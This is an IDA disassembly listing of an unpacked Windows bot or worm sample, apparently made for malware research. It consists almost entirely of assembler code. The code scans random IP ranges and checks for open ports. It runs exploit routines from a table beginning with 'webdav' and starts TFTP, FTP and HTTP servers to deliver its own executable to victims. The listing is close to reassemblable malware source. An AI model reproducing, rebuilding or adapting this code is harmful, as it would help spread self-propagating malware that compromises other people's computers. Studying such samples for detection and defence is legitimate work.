;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 0816671A99BE14BC01513CDA1E2511AB
; File Name : u:\work\0816671a99be14bc01513cda1e2511ab_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0001EBA7 ( 125863.)
; Section size in file : 0001EBA7 ( 125863.)
; Offset to raw data for section: 00001000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: sub_408A18+4CA0�p
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 400h
push ebx
push edi
lea eax, [ebp+var_200]
push offset aScanExploitSta ; "[SCAN]: Exploit Statistics:"
push eax
xor ebx, ebx
call sub_4145E5
cmp dword_42B068, ebx
pop ecx
pop ecx
mov edi, 200h
jz short loc_40106E
push esi
mov esi, offset dword_42B070
loc_401033: ; CODE XREF: sub_401000+6B�j
mov eax, [esi]
push eax
add ebx, eax
lea eax, [esi-26h]
push eax
lea eax, [ebp+var_400]
push offset aSD ; " %s: %d,"
push eax
call sub_4145E5
push edi
lea eax, [ebp+var_400]
push eax
lea eax, [ebp+var_200]
push eax
call sub_4144B0
add esi, 3Ch
add esp, 1Ch
cmp dword ptr [esi-8], 0
jnz short loc_401033
pop esi
loc_40106E: ; CODE XREF: sub_401000+2B�j
push dword_47BEF8
call sub_4115DB
push eax
push ebx
lea eax, [ebp+var_400]
push offset aTotalDInS_ ; " Total: %d in %s."
push eax
call sub_4145E5
push edi
lea eax, [ebp+var_400]
push eax
lea eax, [ebp+var_200]
push eax
call sub_4144B0
push 0
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056FB
lea eax, [ebp+var_200]
push eax
call sub_401EFF
add esp, 38h
pop edi
pop ebx
leave
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010CA proc near ; CODE XREF: sub_408A18+45C0�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push 9
call sub_412661
test eax, eax
pop ecx
jle short loc_401106
mov eax, [ebp+arg_C]
push dword_42E620[eax*8]
call dword_435868 ; inet_ntoa
push eax
lea eax, [ebp+var_200]
push offset aScanCurrentIpS ; "[SCAN]: Current IP: %s."
push eax
call sub_4145E5
add esp, 0Ch
jmp short loc_401119
; ---------------------------------------------------------------------------
loc_401106: ; CODE XREF: sub_4010CA+13�j
lea eax, [ebp+var_200]
push offset aScanScanNotAct ; "[SCAN]: Scan not active."
push eax
call sub_4145E5
pop ecx
pop ecx
loc_401119: ; CODE XREF: sub_4010CA+3A�j
push 0
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056FB
lea eax, [ebp+var_200]
push eax
call sub_401EFF
add esp, 18h
leave
retn
sub_4010CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401141 proc near ; CODE XREF: sub_401B9D+52�p
var_204 = byte ptr -204h
var_4 = byte ptr -4
arg_94 = byte ptr 9Ch
arg_114 = byte ptr 11Ch
arg_194 = dword ptr 19Ch
arg_1B4 = dword ptr 1BCh
arg_1BC = dword ptr 1C4h
arg_1C0 = dword ptr 1C8h
push ebp
mov ebp, esp
sub esp, 204h
mov eax, [ebp+arg_1B4]
cmp eax, 0FFFFFFFFh
jz locret_4014F1
imul eax, 3Ch
push ebx
xor ebx, ebx
cmp dword_42B074[eax], ebx
push esi
jz loc_4013DF
push 5
call sub_412661
test eax, eax
pop ecx
jnz loc_4014EF
mov eax, dword_42BEBC
push edi
push 104h
mov edi, offset dword_42FC34
push edi
push ebx
mov dword_42FE44, eax
mov dword_42FE40, ebx
call ds:dword_420010 ; GetModuleFileNameA
push 103h
push offset byte_42BF44
mov esi, offset dword_42FD38
push esi
call sub_414670
mov eax, [ebp+arg_194]
add esp, 0Ch
cmp [ebp+arg_114], bl
mov dword_42FC30, eax
mov eax, [ebp+arg_1BC]
mov dword_42FEC8, eax
push 7Fh
jnz short loc_4011F4
lea eax, [ebp+arg_94]
push eax
push offset dword_42FE48
call sub_414670
mov dword_42FECC, 1
jmp short loc_40120B
; ---------------------------------------------------------------------------
loc_4011F4: ; CODE XREF: sub_401141+94�j
lea eax, [ebp+arg_114]
push eax
push offset dword_42FE48
call sub_414670
mov dword_42FECC, ebx
loc_40120B: ; CODE XREF: sub_401141+B1�j
add esp, 0Ch
push esi
push edi
push dword_42FE44
lea eax, [ebp+var_204]
push offset aTftpServerStar ; "[TFTP]: Server started on Port: %d, Fil"...
push eax
call sub_4145E5
push ebx
lea eax, [ebp+var_204]
push 5
push eax
call sub_412471
add esp, 20h
mov dword_42FE3C, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_42FC30
push offset sub_411FA9
push ebx
push ebx
call ds:dword_42000C ; CreateThread
mov ecx, dword_42FE3C
imul ecx, 234h
cmp eax, ebx
mov dword_436694[ecx], eax
jnz loc_401327
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_204]
push offset aTftpFailedToSt ; "[TFTP]: Failed to start server, error: "...
push eax
call sub_4145E5
add esp, 0Ch
loc_40128A: ; CODE XREF: sub_401141+1EE�j
lea eax, [ebp+var_204]
push eax
call sub_401EFF
pop ecx
call ds:dword_420004 ; GetTickCount
xor edx, edx
mov ecx, 0F82Fh
div ecx
push 104h
mov edi, offset dword_42F98C
push edi
push ebx
mov dword_42FB98, ebx
add edx, 400h
mov dword_42FB9C, edx
call ds:dword_420010 ; GetModuleFileNameA
push 103h
push offset byte_42BF44
mov esi, offset dword_42FA90
push esi
call sub_414670
mov eax, [ebp+arg_194]
add esp, 0Ch
cmp [ebp+arg_114], bl
mov dword_42F988, eax
mov eax, [ebp+arg_1BC]
mov dword_42FC20, eax
push 7Fh
jnz short loc_401334
lea eax, [ebp+arg_94]
push eax
push offset dword_42FBA0
call sub_414670
mov dword_42FC24, 1
jmp short loc_40134B
; ---------------------------------------------------------------------------
loc_40131F: ; CODE XREF: sub_401141+1EC�j
push 32h
call ds:dword_420000 ; Sleep
loc_401327: ; CODE XREF: sub_401141+128�j
cmp dword_42FED0, ebx
jz short loc_40131F
jmp loc_40128A
; ---------------------------------------------------------------------------
loc_401334: ; CODE XREF: sub_401141+1BF�j
lea eax, [ebp+arg_114]
push eax
push offset dword_42FBA0
call sub_414670
mov dword_42FC24, ebx
loc_40134B: ; CODE XREF: sub_401141+1DC�j
add esp, 0Ch
push esi
push edi
push dword_42FB9C
push dword_42F988
call sub_407D51
pop ecx
push eax
lea eax, [ebp+var_204]
push offset aFtpServerStart ; "[FTP]: Server started on: %s:%d, File: "...
push eax
call sub_4145E5
push ebx
lea eax, [ebp+var_204]
push 6
push eax
call sub_412471
add esp, 24h
mov dword_42FB94, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_42F988
push offset sub_403C3B
push ebx
push ebx
call ds:dword_42000C ; CreateThread
mov ecx, dword_42FB94
imul ecx, 234h
cmp eax, ebx
mov dword_436694[ecx], eax
pop edi
jnz short loc_4013D2
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aFtpFailedToSta ; "[FTP]: Failed to start server, error: <"...
jmp loc_4014D3
; ---------------------------------------------------------------------------
loc_4013CA: ; CODE XREF: sub_401141+297�j
push 32h
call ds:dword_420000 ; Sleep
loc_4013D2: ; CODE XREF: sub_401141+276�j
cmp dword_42FC28, ebx
jz short loc_4013CA
jmp loc_4014E2
; ---------------------------------------------------------------------------
loc_4013DF: ; CODE XREF: sub_401141+25�j
cmp dword_42B078[eax], ebx
jz loc_4014EF
push 4
call sub_412661
test eax, eax
pop ecx
jnz loc_4014EF
push 104h
mov esi, offset dword_42F864
push esi
push ebx
call ds:dword_420010 ; GetModuleFileNameA
push 5Ch
push esi
call sub_414640
cmp eax, ebx
pop ecx
pop ecx
jz short loc_40141D
mov [eax], bl
loc_40141D: ; CODE XREF: sub_401141+2D8�j
mov eax, dword_42BEC0
mov dword_42F968, eax
lea eax, [ebp+arg_94]
push eax
push offset dword_42F5DC
mov dword_42F97C, ebx
call sub_4145E5
mov eax, [ebp+arg_194]
pop ecx
pop ecx
mov ecx, [ebp+arg_1BC]
push esi
push dword_42F968
mov dword_42F974, ecx
mov ecx, [ebp+arg_1C0]
push eax
mov dword_42F5D8, eax
mov dword_42F978, ecx
call sub_407D51
pop ecx
push eax
lea eax, [ebp+var_204]
push offset aHttpdServerLis ; "[HTTPD]: Server listening on IP: %s:%d,"...
push eax
call sub_4145E5
push ebx
lea eax, [ebp+var_204]
push 4
push eax
call sub_412471
add esp, 20h
loc_401495: ; DATA XREF: .data:off_42CC10�o
; .data:off_42D4C8�o
mov dword_42F970, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_42F5D8
push offset sub_404F24
push ebx
push ebx
call ds:dword_42000C ; CreateThread
mov ecx, dword_42F970
imul ecx, 234h
cmp eax, ebx
mov dword_436694[ecx], eax
jnz short loc_4014FB
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aHttpdFailedToS ; "[HTTPD]: Failed to start server, error:"...
loc_4014D3: ; CODE XREF: sub_401141+284�j
lea eax, [ebp+var_204]
push eax
call sub_4145E5
add esp, 0Ch
loc_4014E2: ; CODE XREF: sub_401141+299�j
; sub_401141+3C2�j
lea eax, [ebp+var_204]
push eax
call sub_401EFF
pop ecx
loc_4014EF: ; CODE XREF: sub_401141+35�j
; sub_401141+2A4�j ...
pop esi
pop ebx
locret_4014F1: ; CODE XREF: sub_401141+12�j
leave
retn
; ---------------------------------------------------------------------------
loc_4014F3: ; CODE XREF: sub_401141+3C0�j
push 32h
call ds:dword_420000 ; Sleep
loc_4014FB: ; CODE XREF: sub_401141+384�j
cmp dword_42F984, ebx
jz short loc_4014F3
jmp short loc_4014E2
sub_401141 endp
; =============== S U B R O U T I N E =======================================
sub_401505 proc near ; CODE XREF: sub_401967:loc_4019C9�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
lea esi, ds:42E620h[esi*8]
push dword ptr [esi]
call dword_4358B8 ; ntohl
inc eax
push eax
call dword_43590C ; ntohl
mov [esi], eax
pop esi
retn
sub_401505 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_401525 proc near ; CODE XREF: sub_4017F1+71�p
var_E4 = word ptr -0E4h
var_E2 = word ptr -0E2h
var_E0 = word ptr -0E0h
var_DE = word ptr -0DEh
var_DC = word ptr -0DCh
var_DA = word ptr -0DAh
var_D8 = word ptr -0D8h
var_D6 = word ptr -0D6h
var_D4 = word ptr -0D4h
var_D2 = word ptr -0D2h
var_D0 = word ptr -0D0h
var_CE = word ptr -0CEh
var_CC = word ptr -0CCh
var_CA = word ptr -0CAh
var_C8 = word ptr -0C8h
var_C6 = word ptr -0C6h
var_C4 = word ptr -0C4h
var_C2 = word ptr -0C2h
var_C0 = word ptr -0C0h
var_BE = word ptr -0BEh
var_BC = word ptr -0BCh
var_BA = word ptr -0BAh
var_B8 = word ptr -0B8h
var_B6 = word ptr -0B6h
var_B4 = word ptr -0B4h
var_B2 = word ptr -0B2h
var_B0 = word ptr -0B0h
var_AE = word ptr -0AEh
var_AC = word ptr -0ACh
var_AA = word ptr -0AAh
var_A8 = word ptr -0A8h
var_A6 = word ptr -0A6h
var_A4 = word ptr -0A4h
var_A2 = word ptr -0A2h
var_A0 = word ptr -0A0h
var_9E = word ptr -9Eh
var_9C = word ptr -9Ch
var_9A = word ptr -9Ah
var_98 = word ptr -98h
var_96 = word ptr -96h
var_94 = word ptr -94h
var_92 = word ptr -92h
var_90 = word ptr -90h
var_8E = word ptr -8Eh
var_8C = word ptr -8Ch
var_8A = word ptr -8Ah
var_88 = word ptr -88h
var_86 = word ptr -86h
var_84 = word ptr -84h
var_82 = word ptr -82h
var_80 = word ptr -80h
var_7E = word ptr -7Eh
var_7C = word ptr -7Ch
var_7A = word ptr -7Ah
var_78 = word ptr -78h
var_76 = word ptr -76h
var_74 = word ptr -74h
var_72 = word ptr -72h
var_70 = word ptr -70h
var_6E = word ptr -6Eh
var_6C = word ptr -6Ch
var_6A = word ptr -6Ah
var_68 = word ptr -68h
var_66 = word ptr -66h
var_64 = word ptr -64h
var_62 = word ptr -62h
var_60 = word ptr -60h
var_5E = word ptr -5Eh
var_5C = word ptr -5Ch
var_5A = word ptr -5Ah
var_58 = word ptr -58h
var_56 = word ptr -56h
var_54 = word ptr -54h
var_52 = word ptr -52h
var_50 = word ptr -50h
var_4E = word ptr -4Eh
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = word ptr -48h
var_46 = word ptr -46h
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = word ptr -40h
var_3E = word ptr -3Eh
var_3C = word ptr -3Ch
var_3A = word ptr -3Ah
var_38 = word ptr -38h
var_36 = word ptr -36h
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = word ptr -0Ch
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 0E4h
xor eax, eax
mov [ebp+74h+var_E4], ax
mov [ebp+74h+var_E2], 1
mov [ebp+74h+var_E0], 2
mov [ebp+74h+var_DE], 5
mov [ebp+74h+var_DC], 7
mov [ebp+74h+var_DA], 0Bh
mov [ebp+74h+var_D8], 17h
mov [ebp+74h+var_D6], 1Bh
mov [ebp+74h+var_D4], 1Fh
mov [ebp+74h+var_D2], 24h
mov [ebp+74h+var_D0], 25h
mov [ebp+74h+var_CE], 27h
mov [ebp+74h+var_CC], 29h
mov [ebp+74h+var_CA], 2Ah
mov [ebp+74h+var_C8], 31h
mov [ebp+74h+var_C6], 32h
mov [ebp+74h+var_C4], 49h
mov [ebp+74h+var_C2], 4Ah
mov [ebp+74h+var_C0], 4Bh
mov [ebp+74h+var_BE], 4Ch
mov [ebp+74h+var_BC], 4Dh
mov [ebp+74h+var_BA], 4Eh
mov [ebp+74h+var_B8], 4Fh
mov [ebp+74h+var_B6], 59h
mov [ebp+74h+var_B4], 5Ah
mov [ebp+74h+var_B2], 5Bh
mov [ebp+74h+var_B0], 5Ch
mov [ebp+74h+var_AE], 5Dh
mov [ebp+74h+var_AC], 5Eh
mov [ebp+74h+var_AA], 5Fh
mov [ebp+74h+var_A8], 60h
mov [ebp+74h+var_A6], 61h
mov [ebp+74h+var_A4], 62h
mov [ebp+74h+var_A2], 63h
mov [ebp+74h+var_A0], 64h
mov [ebp+74h+var_9E], 65h
mov [ebp+74h+var_9C], 66h
mov [ebp+74h+var_9A], 67h
mov [ebp+74h+var_98], 68h
mov [ebp+74h+var_96], 69h
mov [ebp+74h+var_94], 6Ah
mov [ebp+74h+var_92], 6Bh
mov [ebp+74h+var_90], 6Ch
mov [ebp+74h+var_8E], 6Dh
mov [ebp+74h+var_8C], 6Eh
mov [ebp+74h+var_8A], 6Fh
mov [ebp+74h+var_88], 70h
mov [ebp+74h+var_86], 71h
mov [ebp+74h+var_84], 72h
mov [ebp+74h+var_82], 73h
mov [ebp+74h+var_80], 74h
mov [ebp+74h+var_7E], 75h
mov [ebp+74h+var_7C], 76h
mov [ebp+74h+var_7A], 77h
mov [ebp+74h+var_78], 78h
mov [ebp+74h+var_76], 79h
mov [ebp+74h+var_74], 7Ah
mov [ebp+74h+var_72], 7Bh
mov [ebp+74h+var_70], 7Ch
mov [ebp+74h+var_6E], 7Dh
mov [ebp+74h+var_6C], 7Eh
mov [ebp+74h+var_6A], 7Fh
mov [ebp+74h+var_68], 0ADh
mov [ebp+74h+var_66], 0AEh
mov [ebp+74h+var_64], 0AFh
mov [ebp+74h+var_62], 0B0h
mov [ebp+74h+var_60], 0B1h
mov [ebp+74h+var_5E], 0B2h
mov [ebp+74h+var_5C], 0B3h
mov [ebp+74h+var_5A], 0B4h
mov [ebp+74h+var_58], 0B5h
mov [ebp+74h+var_56], 0B6h
mov [ebp+74h+var_54], 0B7h
mov [ebp+74h+var_52], 0B8h
mov [ebp+74h+var_50], 0B9h
mov [ebp+74h+var_4E], 0BAh
mov [ebp+74h+var_4C], 0BBh
mov [ebp+74h+var_4A], 0BDh
mov [ebp+74h+var_48], 0BEh
mov [ebp+74h+var_46], 0C5h
mov [ebp+74h+var_44], 0DFh
mov [ebp+74h+var_42], 0E0h
mov [ebp+74h+var_40], 0E1h
mov [ebp+74h+var_3E], 0E2h
mov [ebp+74h+var_3C], 0E3h
mov [ebp+74h+var_3A], 0E4h
mov [ebp+74h+var_38], 0E5h
mov [ebp+74h+var_36], 0E6h
mov [ebp+74h+var_34], 0E7h
mov [ebp+74h+var_32], 0E8h
mov [ebp+74h+var_30], 0E9h
mov [ebp+74h+var_2E], 0EAh
mov [ebp+74h+var_2C], 0EBh
mov [ebp+74h+var_2A], 0ECh
mov [ebp+74h+var_28], 0EDh
mov [ebp+74h+var_26], 0EEh
mov [ebp+74h+var_24], 0EFh
mov [ebp+74h+var_22], 0F0h
mov [ebp+74h+var_20], 0F1h
mov [ebp+74h+var_1E], 0F2h
mov [ebp+74h+var_1C], 0F3h
mov [ebp+74h+var_1A], 0F4h
mov [ebp+74h+var_18], 0F5h
mov [ebp+74h+var_16], 0F6h
mov [ebp+74h+var_14], 0F7h
mov [ebp+74h+var_12], 0F8h
mov [ebp+74h+var_10], 0F9h
mov [ebp+74h+var_E], 0FAh
mov [ebp+74h+var_C], 0FBh
mov [ebp+74h+var_A], 0FCh
mov [ebp+74h+var_8], 0FDh
mov [ebp+74h+var_6], 0FEh
mov [ebp+74h+var_4], 0FFh
loc_4017D6: ; CODE XREF: sub_401525+2BF�j
movsx ecx, [ebp+eax*2+74h+var_E4]
cmp [ebp+74h+arg_0], ecx
jz short loc_4017ED
inc eax
cmp eax, 71h
jb short loc_4017D6
xor al, al
loc_4017E8: ; CODE XREF: sub_401525+2CA�j
add ebp, 74h
leave
retn
; ---------------------------------------------------------------------------
loc_4017ED: ; CODE XREF: sub_401525+2B9�j
mov al, 1
jmp short loc_4017E8
sub_401525 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4017F1 proc near ; CODE XREF: sub_401967+5A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_0]
push edi
or edi, 0FFFFFFFFh
mov [ebp+var_4], edi
mov [ebp+var_C], edi
mov [ebp+var_8], edi
mov [ebp+var_10], edi
lea ecx, [eax+1]
loc_40180D: ; CODE XREF: sub_4017F1+21�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40180D
sub eax, ecx
cmp eax, 0Fh
jbe short loc_401822
xor eax, eax
jmp loc_4018C7
; ---------------------------------------------------------------------------
loc_401822: ; CODE XREF: sub_4017F1+28�j
push esi
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push [ebp+arg_0]
call sub_4147C3
add esp, 18h
cmp [ebp+var_4], edi
jnz short loc_40186C
call sub_4147A1
mov esi, 0FFh
jmp short loc_401859
; ---------------------------------------------------------------------------
loc_401854: ; CODE XREF: sub_4017F1+79�j
call sub_4147A1
loc_401859: ; CODE XREF: sub_4017F1+61�j
cdq
mov ecx, esi
idiv ecx
push edx
mov [ebp+var_4], edx
call sub_401525
test al, al
pop ecx
jnz short loc_401854
loc_40186C: ; CODE XREF: sub_4017F1+55�j
cmp [ebp+var_C], edi
mov esi, 100h
jnz short loc_401883
call sub_4147A1
cdq
mov ecx, esi
idiv ecx
mov [ebp+var_C], edx
loc_401883: ; CODE XREF: sub_4017F1+83�j
cmp [ebp+var_8], edi
jnz short loc_401893
call sub_4147A1
cdq
idiv esi
mov [ebp+var_8], edx
loc_401893: ; CODE XREF: sub_4017F1+95�j
mov edx, [ebp+var_10]
cmp edx, edi
pop esi
jnz short loc_4018A9
call sub_4147A1
cdq
mov ecx, 0FEh
idiv ecx
inc edx
loc_4018A9: ; CODE XREF: sub_4017F1+A8�j
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
shl edx, 8
add edx, [ebp+var_8]
shl edx, 8
add edx, [ebp+var_C]
shl edx, 8
add eax, edx
mov dword_42E620[ecx*8], eax
loc_4018C7: ; CODE XREF: sub_4017F1+2C�j
pop edi
leave
retn
sub_4017F1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4018CA proc near ; CODE XREF: sub_401967+A9�p
; sub_4039C6+2C�p
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
xor edi, edi
xor ebx, ebx
push ebx
inc edi
push edi
push 2
mov [ebp+var_4], edi
call dword_4357E8 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4018F3
xor eax, eax
jmp short loc_401962
; ---------------------------------------------------------------------------
loc_4018F3: ; CODE XREF: sub_4018CA+23�j
mov eax, [ebp+arg_0]
push [ebp+arg_4]
mov [ebp+var_1C], 2
mov [ebp+var_18], eax
call dword_435934 ; ntohs
mov [ebp+var_1A], ax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push esi
call dword_43578C ; ioctlsocket
push 10h
lea eax, [ebp+var_1C]
push eax
push esi
call dword_4357A0 ; connect
mov eax, [ebp+arg_8]
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
push ebx
lea eax, [ebp+var_120]
push eax
push ebx
push ebx
mov [ebp+var_8], ebx
mov [ebp+var_11C], esi
mov [ebp+var_120], edi
call dword_43588C ; select
push esi
mov edi, eax
call dword_4358F4 ; closesocket
xor eax, eax
cmp edi, ebx
setnle al
loc_401962: ; CODE XREF: sub_4018CA+27�j
pop edi
pop esi
pop ebx
leave
retn
sub_4018CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401967 proc near ; DATA XREF: sub_401B9D+144�o
var_3B0 = dword ptr -3B0h
var_394 = dword ptr -394h
var_390 = byte ptr -390h
var_380 = byte ptr -380h
var_300 = dword ptr -300h
var_2FC = byte ptr -2FCh
var_27C = byte ptr -27Ch
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_254 = byte ptr -254h
var_1D4 = byte ptr -1D4h
var_1C4 = byte ptr -1C4h
var_144 = dword ptr -144h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 394h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 74h
mov esi, eax
pop ecx
lea edi, [ebp+var_1D4]
rep movsd
mov edi, [ebp+var_2C]
mov dword ptr [eax+1CCh], 1
mov eax, [ebp+var_28]
mov [ebp+var_4], edi
mov [ebp+arg_0], eax
call ds:dword_420004 ; GetTickCount
push eax
call sub_414794
mov ebx, edi
pop ecx
imul ebx, 234h
jmp loc_401B79
; ---------------------------------------------------------------------------
loc_4019B3: ; CODE XREF: sub_401967+220�j
cmp [ebp+var_10], 0
push eax
jz short loc_4019C9
lea eax, [ebp+var_1D4]
push eax
call sub_4017F1
pop ecx
jmp short loc_4019CE
; ---------------------------------------------------------------------------
loc_4019C9: ; CODE XREF: sub_401967+51�j
call sub_401505
loc_4019CE: ; CODE XREF: sub_401967+60�j
pop ecx
push [ebp+arg_0]
mov esi, eax
push dword_436684[ebx]
push [ebp+var_3C]
push esi
call dword_435868 ; inet_ntoa
push eax
lea eax, [ebp+var_254]
push offset aScanIpSDScanTh ; "[SCAN]: IP: %s:%d, Scan thread: %d, Sub"...
push eax
call sub_4145E5
lea eax, [ebp+var_254]
push eax
lea eax, dword_436480[ebx]
push eax
call sub_4145E5
push [ebp+var_38]
push [ebp+var_3C]
push esi
call sub_4018CA
add esp, 2Ch
cmp eax, 1
jnz loc_401B6E
cmp [ebp+var_20], 0FFFFFFFFh
jnz short loc_401AA2
push offset dword_42F5C0
call ds:dword_42001C ; RtlEnterCriticalSection
push [ebp+var_3C]
push esi
call dword_435868 ; inet_ntoa
push eax
lea eax, [ebp+var_254]
push offset aScanIpSPortDIs ; "[SCAN]: IP: %s, Port %d is open."
push eax
call sub_4145E5
add esp, 10h
cmp [ebp+var_14], 0
jnz short loc_401A84
cmp [ebp+var_C0], 0
push 1
push [ebp+var_18]
lea eax, [ebp+var_254]
push eax
lea eax, [ebp+var_C0]
jnz short loc_401A78
lea eax, [ebp+var_140]
loc_401A78: ; CODE XREF: sub_401967+109�j
push eax
push [ebp+var_40]
call sub_4056FB
add esp, 14h
loc_401A84: ; CODE XREF: sub_401967+EE�j
lea eax, [ebp+var_254]
push eax
call sub_401EFF
mov [esp+3B0h+var_3B0], offset dword_42F5C0
call ds:dword_420018 ; RtlLeaveCriticalSection
jmp loc_401B6E
; ---------------------------------------------------------------------------
loc_401AA2: ; CODE XREF: sub_401967+BE�j
push esi
call dword_435868 ; inet_ntoa
push eax
lea eax, [ebp+var_390]
push eax
call sub_4145E5
mov eax, [ebp+var_20]
imul eax, 3Ch
add eax, offset aWebdav ; "webdav"
push eax
lea eax, [ebp+var_27C]
push eax
call sub_4145E5
add esp, 10h
cmp [ebp+var_C0], 0
lea eax, [ebp+var_C0]
jnz short loc_401AE6
lea eax, [ebp+var_140]
loc_401AE6: ; CODE XREF: sub_401967+177�j
push eax
lea eax, [ebp+var_2FC]
push eax
call sub_4145E5
mov eax, [ebp+var_144]
pop ecx
mov [ebp+var_300], eax
pop ecx
xor eax, eax
loc_401B03: ; CODE XREF: sub_401967+1AD�j
mov cl, [ebp+eax+var_1C4]
mov [ebp+eax+var_380], cl
inc eax
test cl, cl
jnz short loc_401B03
mov eax, [ebp+var_40]
mov [ebp+var_394], eax
mov eax, [ebp+var_18]
mov [ebp+var_260], eax
mov eax, [ebp+var_14]
mov [ebp+var_25C], eax
mov eax, [ebp+var_3C]
mov [ebp+var_270], eax
mov eax, [ebp+var_20]
mov [ebp+var_268], eax
imul eax, 3Ch
sub esp, 140h
push 50h
pop ecx
mov [ebp+var_26C], edi
lea esi, [ebp+var_394]
mov edi, esp
rep movsd
call off_42B06C[eax]
mov edi, [ebp+var_4]
add esp, 140h
loc_401B6E: ; CODE XREF: sub_401967+B4�j
; sub_401967+136�j
push 7D0h
call ds:dword_420000 ; Sleep
loc_401B79: ; CODE XREF: sub_401967+47�j
mov eax, dword_436684[ebx]
cmp dword_42E624[eax*8], 0
jnz loc_4019B3
push edi
call sub_412735
pop ecx
push 0
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_401967 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_401B9D proc near ; DATA XREF: sub_408A18+402C�o
; sub_408A18+5A74�o
var_304 = dword ptr -304h
var_250 = byte ptr -250h
var_1C0 = dword ptr -1C0h
var_1BC = byte ptr -1BCh
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
push ebp
